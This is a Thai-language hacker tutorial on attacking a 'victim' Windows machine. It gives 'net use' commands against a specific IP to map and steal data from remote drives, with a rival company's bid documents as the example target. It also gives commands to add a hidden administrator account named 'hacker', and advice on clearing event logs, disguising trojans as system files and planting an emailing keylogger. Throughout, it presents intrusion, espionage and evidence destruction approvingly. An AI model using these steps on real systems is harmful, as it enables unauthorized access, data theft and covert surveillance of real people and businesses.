การขโมยข้อมูล

การขโมยข้อมูล


(Pilfering)

หัวข้อนี้ก็ไม่ได้มีอะไรสำคัญอีกเหมือนกัน เพียงแต่ ต้องหัดเป็นคนสังเกตุ และก็ งก นิดๆ เหอๆ "ทำไมผมพูดแบบนี้"

ถ้าคุณนั้นสามารถเข้าไปดูไฟล์ต่างๆจากเครื่องเหยื่อได้แล้ว (MapDrive) คุณสามารถที่จะเห็นไฟล์ข้อมูลต่างๆเช่น ไฟล์งานทั่วๆไป ไฟล์ที่เก็บpassword ไฟล์ข้อมูลของบุคคลอื่นๆ ถ้าใส่ใจกับสิ่งแวดล้อมในไฟล์ข้อมูล คุณอาจได้ประโยชน์มากกว่าที่คิดเสียอีก แต่ก็อย่าลืมเรื่องเวลาด้วยนะ อย่าไปเกาะเครื่องเหยื่อนานจนเกินไป เหยื่อคุณอาจไม่หมูก็ได้ และจะโดนสวนกลับ จนหงายเก๋ง

ลองคิดดูว่าถ้าเป็นบริษัทที่มีการแข่งขันกัน อย่างการประมูลราคางานต่างๆ ถ้าโชคดีเข้าไปดูไฟล์ที่บริษัทคู่แข่งส่งประมูล คิดดูว่าบริษัทผมจะได้เปรียบขนาดไหน เวลายื่นซองประมูลงาน เงินที่ผมประมูลต่างจากบริษัทคู่แข่งแค่ 10 บาท เพียงแค่นี้กลายเป็นว่าบริษัทผมชนะการประมูล คิกๆ เรื่องข้อมูล สมัยนี้ถือว่าสำคัญมากๆ เอาเป็นว่าถ้าใครมีข้อมูลเยอะกว่า แน่นอนกว่า จะได้เปรียบมากกว่า จริงมั้ยครับ แต่ผมมักสนใจกับไฟล์รูปมากกว่าอ่า.... ไม่โหดพอ



การ Map Drive

และหลังจากที่คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ

net use \\ 203.114.234.5 \ C$ passhack /u:hacker

คำสั่งบนนี้ จะเป็นการเชื่อมต่อไปที่ share drive c: ในเครื่องเป้าหมาย โดย PasswordAdmin เป็นสิ่งที่ได้มาจากขั้นตอนด้านบนเรียบร้อยมาแล้วนะครับ โดยเครื่องนั้นต้องเปิด share C$ มาก่อนหน้านี้ แต่ถ้าคุณได้ใช้คำสั่งนี้แล้วยังเชื่อมต่อ (connect) ยังไม่ได้อีกคุณอาจต้องพิมพ์

net use \\ 203.114.234.5 \ C$ passhack /u:203.114.234.5\ hacker

โดยเพิ่ม 203.114.234.5 มาตรงหน้า user Admin ขึ้นมาครับหรือ

net use \\ 203.114.234.5 \ C$ passhack /u:ชื่อเครื่องเหยื่อหรือชื่อ domain\ hacker

แต่ถ้าพิมพ์เป็น net use \\ ...IP เหยื่อ.. \D$ passhack /u: hacker

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

ซึ่งตอนนี้อาจลองเช็คดู IP ที่หน้าต่างดอสนี้โดยลองพิมพ์ ipconfig หรือใช้คำสั่ง dir ในหน้าต่างนี้ เพื่อให้แน่ใจว่าเป็นเครื่องเป้าหมาย ถ้าลองดูแล้วเป็นเครื่องเป้าหมายจริงๆ ก็เหมือนกับคุณได้นั่งอยู่หน้าเครื่องเป้าหมายจริงๆ การพิมพ์คำสั่งต่างๆในหน้าต่างนี้ ก็คือการสั่งคำสั่งต่างๆในเครื่องเป้าหมาย ไม่ใช่เครื่องคุณ และคุณอาจส่งไฟล์ไปโดยโปรแกรม remote เพื่อที่จะสร้างทางลับต่าง เพื่อที่จะเข้าไปควบคุมอีก ในโอกาสหน้า การส่งโปรแกรมไปนั้น ดูวิธีได้จาก link Backdoor



อีกวิธีแบบง่ายๆ ไม่ต้องยุ่งยากแบบวิธีด้านบน

Terminial Service นั้นจะเป็นการอนุญาตให้ Admin สามารถรีโมทมากระทำการแก้ไขส่วนต่างๆภายในคอมพิวเตอร์จากระยะไกล ได้โดยเป็น mode graphic ถ้าไม่อย่างนั้น คุณก็ต้องใช้โปรแกรม tftp32.exe โดยใช้บนดอสแบบวิธีด้านบน ถ้าเครื่องเหยื่อไม่ได้เปิด Terminial Service แล้ว คุณจะใช้วิธีแบบที่ผมสาธิตข้างล่างนี้ไม่ได้

ให้เปิดโปรแกรม Windows Explorer ขึ้นมาก่อนครับแล้วทำตามรูปด้านล่าง

จะมีหน้าต่างขึ้นมาดังรูปด้านล่างนี้

drive G จะเป็น drive ที่เราได้มาจากเครื่องเหยื่อ จะมาอยู่ที่ G: ของเครื่องเรา
อีกช่อง ให้คุณใส IP เครื่องเหยื่อที่เราได้ และแชร์ที่คุณจะเข้าไปในเครื่องเหยื่อ ซึ่งเขียนได้แบบนี้
\\...IP เหยื่อ.. \IPC$ เป็นการเข้าไปที่ share ของเครื่องเป้าหมาย ** สำคัญมาก ** ซึ่งเครื่องเป้าหมายต้องเปิดรอเอาไว้และมีหลายๆตัว ที่คุณสามารจะใช้ได้ครับ IPC$ ใช้ได้ก็ต่อเมื่อ port 139 ของเครื่องเป้าหมายเปิดรออยู่ Listen นั่นเอง โดยคุณอาจแสกนไปที่เครื่องเป้าหมายก่อน ที่จะใช้คำสั่งนี้ คุณอาจเปลี่ยนไป connect เชื่อมต่อที่ share อื่นๆ ได้โดย \\...IP เหยื่อ.. \C$


\\...IP เหยื่อ.. \C$

C$ เป็นการ connect เชื่อมต่อที่ share ของ drive C:

\\...IP เหยื่อ.. \D$

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

ให้คุณใส IP เครื่องเหยื่อที่เราได้ และแชร์ที่คุณจะเข้าไปในเครื่องเหยื่อ ซึ่งเขียนได้แบบนี้

\\...IP เหยื่อ.. \IPC$ เป็นการเข้าไปที่ share ของเครื่องเป้าหมาย ** สำคัญมาก ** ซึ่งเครื่องเป้าหมายต้องเปิดรอเอาไว้และมีหลายๆตัว ที่คุณสามารจะใช้ได้ครับ IPC$ ใช้ได้ก็ต่อเมื่อ port 139 ของเครื่องเป้าหมายเปิดรออยู่ Listen นั่นเอง โดยคุณอาจแสกนไปที่เครื่องเป้าหมายก่อน ที่จะใช้คำสั่งนี้ คุณอาจเปลี่ยนไป connect เชื่อมต่อที่ share อื่นๆ ได้โดย




C$ เป็นการ connect เชื่อมต่อที่ share ของ drive C:

\\...IP เหยื่อ.. \D$

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

จากนั้นคุณก็กดปุ่ม Finish แล้วจะมีหน้าต่างขึ้นมา จากนั้นให้คุณใส่ Username Admin ของเครื่องเหยื่อ กับ Password ที่เราได้มาจากการทำ Brute Force หรือ Dump Password ที่เครื่องเหยื่อได้มาแล้ว

การปิดบังอำพราง การแฮก

การปิดบังอำพราง


(Covering)

ในหัวข้อนี้ ไม่ได้มีอะไรมากเลยครับ จะเปรียบเทียบบางอย่างให้คุณฟังก่อนนะครับ ถ้าคุณไปย่องเบาที่บ้านใครก็ตาม เวลาเสร็จงานโจรกรรมต่างๆแล้วก็ต้องมีการทำลายหลักฐาน จริงมั้ยครับ การที่จะ Hack เครื่องใดๆก็ตามแต่ สำหรับผู้ที่ชำนาญแล้ว มักจะต้องลบร่องรอยต่างๆที่ได้กระทำเอาไว้ (หรือลบไฟล์ข้อมูลเหยื่อด้วย หรือป่าว! อย่าเชียวน๊า อย่าไปแกล้งเค้า) คุณแค่ลบไฟล์ ที่เป็นไฟล์ log ที่เก็บข้อมูลต่างๆเท่านั้นก็เพียงพอแล้ว และไฟล์ที่คุณได้ส่งเข้าไป หรือสร้างขึ้นมาบนเครื่องเหยื่อ ถ้ามันหมดประโยชน์แล้วก็ควรกำจัดทิ้งไปด้วย

นอกเรื่องอีกนิด

จากประสบการณ์ผม ที่เคยเจาะตามเครื่องต่างๆ รวมถึงบางเว็บไซด์ ผมจะส่งเมล์หรือเซฟ text file เอาไว้ที่เครื่องเหยื่อว่า เครื่องคุณมีช่องโหว่ นี่ไงหลักฐานว่าผมได้บุกเข้ามาในเครื่องคุณได้แล้ว และทิ้งเมล์ให้เค้าติดต่อกลับมา เชื่อมั้ย ไม่มีคนตอบกลับมาซักคนเลยอ่า เราก็อุตสาห์เป็นคนดีมีจรรยาบรรณ มันเสือกดันไม่สนใจซะนี่ แย่เจงๆ พักหลังๆผมเลยเอาโปรแกรม remote ไปลงซะเลย คิกๆ ปรากฏว่า "วันๆมานเล่นแต่เกมส์ โอ้ววว... อนาคตเด็กไทย" แต่ดีนะไม่มีรูปโป้ ไม่งั้นเสร็จผม มานสนแต่เกมส์ บ้าเจง ไม่เห็นเหมือนเราเลย คิกๆ

โปรแกรมที่ผมเคยใช้เล่นกันอยู่บ่อยก็คือโปรแกรม Cleareventlog.exe ซึ่งโปรแกรมนี้จะคอยลบไฟล์ต่างๆใน log ให้หมดสิ้นไป ส่วนโปรแกรมอื่นคุณลองหาจากใน Internet จาก google เองนะครับ การค้นหาก็คงไม่ยากเย็นอะไร

สรุป

-ไฟล์ต่างๆที่คุณได้ส่งไปรันที่เครื่งอเหยื่อนั้น เช่นไฟล์ server ต่างๆไม่ว่าจะเป็นของ Backdoor Trojan Remote ต่างๆ การปิดบังที่ดีที่สุดคือ เปลี่ยนชื่อไฟล์เหล่านั้นให้เป็นชื่อคล้ายๆกับไฟล์ระบบ เช่น nodepad.exe หรือ NTsys.exe เพื่อให้เหยื่อเห็นแล้วไม่กล้าที่จะลบ

-ไฟล์บางไฟล์เช่นไฟล์ที่เป็นตัวติดตั้งโปรแกรมเช่น bat file ที่คุณสร้างมาเพื่อติดตั้ง Backdoor Trojan Remote ต่างๆ ให้คุณทำการลบทิ้งด้วย หรือเพิ่มคำสั่งให้มันมีการลบตัวเอง

-หาโปรแกรมต่างๆที่กำจัด log ไฟล์ต่างๆ (โปรแกรมประเภทที่ไม่จำเป็นต้องติดตั้งที่เครื่องเหยื่อ) ที่สามารถรันได้เลยจะยิ่งดี เพราะมันจะทำการเคลียร์ ลบ หลักฐานต่างๆที่เราเข้าไปเจาะ ซึ่งบางทีมันอาจเก็บค่า IP รวมไปถึงการกระทำต่างๆ และเวลา ที่คุณได้กระทำเอาไว้

-อันนี้อาจไม่เกี่ยวซักเท่าไหร่ "คุณอย่าเที่ยวไปเป่าประกาศตามเว็บบอร์ดหรือในหน่วยงาน ว่าฉ้านก็เป็น Hacker" เพราะ เมื่อเกิดเหตุการณ์ต่างๆที่ เป็นการเข้าข่ายโจรกรรมทางข้อมูลต่างๆในหน่วยงานคุณเอง หรือที่ไหนๆก็ตาม คุณนั่นแหละเป็นคนแรกที่จะซวย นิ่งไว้

อยากเป็นแฮกเกอร์ ก็ต้องทำใจ

การยกระดับสิทธิ

Admin Priviledge

Keylog


โปรแกรมประเภท Keylog คือเป็นโปรแกรมประเภท ดักจับข้อมูลต่างๆที่ที่ถูกพิมพ์ลงไปด้วย kebord หรือแป้นพิมพ์ที่คุณใช้อยู่เป็นประจำ จะเกิดอะไรขึ้นถ้าโปรแกรมประเภทนี้มาอยู่ที่เครื่องคุณ เหอๆ "ละเมิดสิทธิกันนี่หว่า" ถึงคุณจะโวยวายแบบนี้ไป ผมเชื่อว่า คนที่เอาโปรแกรมแบบนี้มาใส่ในเครื่องคุณ เค้าไม่สลดหลอกครับ คิกๆ

ลองคิดดูว่า ตั้งแต่คุณเปิดเครื่องคอมใช้ คุณต้องพิมพ์อะไรลงไปบ้าง เวลาคุณเช็คเมล์ คุณต้องพิมพ์อะไรไปบ้าง "ให้ระวังร้าน Internet ให้ดีๆ อย่าไปเช็คเมล์หรือ login เข้าเว็บต่างๆในร้าน" เพราะถ้าเกิดมีผู้ไม่หวังดีแอบลงเอาไว้ แล้วคุณจะจ๋อย... เมื่อคุณโดนขโมย บางคนที่เป็น Webmaster และชอบไปใช้ร้าน Internet เพื่อ login ต่างๆไม่ว่าจะ mail หรืออะไรก็ตาม ผมเห็นมาเยอะแล้ว "โอ้วว...โน้... เว็บผมโดน hack เกียจจริงๆไอ้พวก hacker นี่ มันเลวเจงๆ อย่าให้กรูรู้นะว่าใคร " ผมว่าคุณโทษตัวเองดีกว่านะ

ส่วนโปรแกรมเท่าที่ผมลองใช้มีทั้งในดอส และเป็นแบบแสดงผลที่อ่านเข้าใจง่าย นั้นหาน้อยตัวที่จะรองรับภาษาไทย แต่ก็มีอยู่ 1 โปรแกรมที่ผมเคยใช้ และดีมากๆ ชื่อโปรแกรม StarMonitor ไม่มีปัญหากับภาษาไทยด้วย ขอบอก และยังสามารถดักจับ ภาพหน้าจอโดยการตั้งเวลาได้อีกด้วย และท้ายสุด โปรแกรมนี้สามารถที่จะส่งเมล์ไปหาคุณได้โดย อัตโนมัติด้วซิ น่ากลัวมั้ยครับส่วนโปรแกรมประเภทนี้ตัวอื่นๆ ผมไม่เคยได้ลองครับ คุณอาจหาได้จาก google โปรแกรมนี้มีอยู่ในแผ่น cd ที่ผมขายนะครับ(ไฟล์สอนเป็นไฟล์ vdo)ติดต่อ Webmaster

________________________________________

Exploit

วิธีการนี้ คุณจะต้องทำหลังจาก Access เข้าไปในเครื่องเหยื่อได้แล้ว หรือคุณสามารถที่จะนั่งอยู่หน้าจอเครื่องเหยื่อได้ ถ้าไม่เข้าใจไปอ่านที่นี่ครับ Gaining Access เมื่อคุณ Access หรือเข้าไปในเครื่องเหยื่อจากระยะไกลได้แล้วถึงจะทำวิธีตามที่ผมบอกในด้านล่างนี้

วิธีที่เนียนที่สุด ให้คุณสร้าง Account ใหม่ลงไปบนเครื่องเหยื่อ แล้วทำให้ Account ใหม่ที่สร้างขึ้นมาเป็น Admin (ในกรณีที่ admin ในเครื่องเหยื่อได้กำลังใช้งานอยู่ ในตอนที่คุณ hack วิธีด้านบนได้แล้ว) โดยพิมพ์คำสั่งด้านล่างนี้ลงไปที่หน้าต่างดอสของเครื่องเหยื่อ แล้วคุณก็ได้ขโมยหน้าต่างดอสมาได้แล้วด้วย ทำได้โดยพิมพ์แต่ละบรรทัดต้องกด enter ทุกครั้ง มี 2 บรรทัดดังนี้

net user hacker passhack /add

net localgroup Administrators hacker /add

(คำสั่งตรงที่ตัวอักษร สีเหลือง นั้น คุณสามารถเปลี่ยนได้ตามต้องการ แต่ต้องจำไว้ด้วยว่าตั้งชื่อ/ pass อะไรลงไป เพื่อที่จะเข้าไปคุมเครื่องเหยื่อเครื่องนี้อีกเมื่อไหร่)

บรรทัดแรก จะเป็นการสร้าง user ชื่อ hacker ขึ้นมาในเครื่องเหยื่อ และให้ user นี้มี password เป็น passhack

บรรทัดที่ 2 จะเป็นการทำให้ ชื่อ user ที่ชื่อ hacker ที่เราได้ทำไปในบรรทัดที่ 1 นั้นเป็น Administrator (ให้เติมตัว “s” ลงไปที่ท้าย Administrator ด้วยดังตัวอย่างที่ผมเขียน)

หลังจากที่คุณได้สร้างคำสั่งเพิ่ม user ด้านบนนี้แล้ว คุณจะยังไม่สามารถใช้ user ตัวที่คุณสร้างใหม่ได้จนกว่า เครื่องเหยื่อได้มีการ ล็อกเอาท์ออกไปก่อน โดยคุณอาจส่งโปรแกรม shutdown ไปที่เครื่องเหยื่อก่อน แล้วสั่ง shutdown แต่คุณต้องจำชื่อเครื่องด้วยนะครับ เพราะว่าครั้งต่อไปที่ต่อเน็ต คุณลองแสกนหาชื่อเครื่องนั้นๆให้เจอก่อน แล้วค่อยเข้าไปโดย user ที่คุณได้ตั้งมาใหม่ด้วยคำสั่ง net use ในดอส หรืออาจทำการ Map Drive ก็ได้

Map Drive คือการที่เอาไดรว์ของเครื่องเป้าหมาย มาอยู่ในเครื่องคุณเอง ซึ่งจะเปรียบเหมือนว่าเป็นไดรว์ตัวนึง ในเครื่องคุณเองครับ ซึ่งเมื่อทำสำเร็จแล้ว คุณจะเห็นไฟล์ทุกอย่างในเครื่องเป้าหมายในเครื่องคุณเอง สามารถ copy ย้าย ได้ แต่ ขอเตือน ว่า ถ้ารันโปรแกรมในหน้าต่าง Win Explorer นั้น หมายถึงเป็นการ รันโปรแกรมที่เครื่องคุณนะครับ ไม่ใช่เครื่องเป้าหมาย